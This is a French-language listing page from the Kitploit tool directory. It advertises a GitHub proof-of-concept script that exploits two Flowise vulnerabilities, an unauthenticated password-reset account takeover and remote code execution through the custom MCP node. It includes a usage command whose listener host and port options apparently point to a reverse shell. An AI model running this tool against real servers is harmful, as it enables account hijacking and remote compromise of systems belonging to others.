Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-58434_CVE-2025-59528 — CVE-2025-58434 Flowise <= 3.0.5 et versions antérieures permet la prise de contrôle de compte via un jeton de réinitialisation de mot de passe non authentifié. CVE-2025-59528 lowiseAI Custom MCP Node Remote Code Execution. | Kitploit
Outils/GitHubGitHub/honney336/cve-2025-58434_cve-2025-59528
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationOutil d'Accès à Distance
GitHubhonney336/cve-2025-58434_cve-2025-59528

CVE-2025-58434_CVE-2025-59528

CVE-2025-58434 Flowise <= 3.0.5 et versions antérieures permet la prise de contrôle de compte via un jeton de réinitialisation de mot de passe non authentifié. CVE-2025-59528 lowiseAI Custom MCP Node Remote Code Execution.

Voir le dépôt
3il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Script PoC pour CVE-2025-58434 et CVE-2025-59528

CVE-2025-58434 Flowise <= 3.0.5 et versions antérieures permet le détournement de compte via un jeton de mot de passe oublié non authentifié. CVE-2025-59528 Exécution de code à distance via le nœud MCP personnalisé de flowiseAI.

Utilisation :

python3 RCE.py -d "example.com" -e "[email protected]" -np "Password@a123" -lh <IP_addr> -lp <Listening_port>

Télécharger l’outil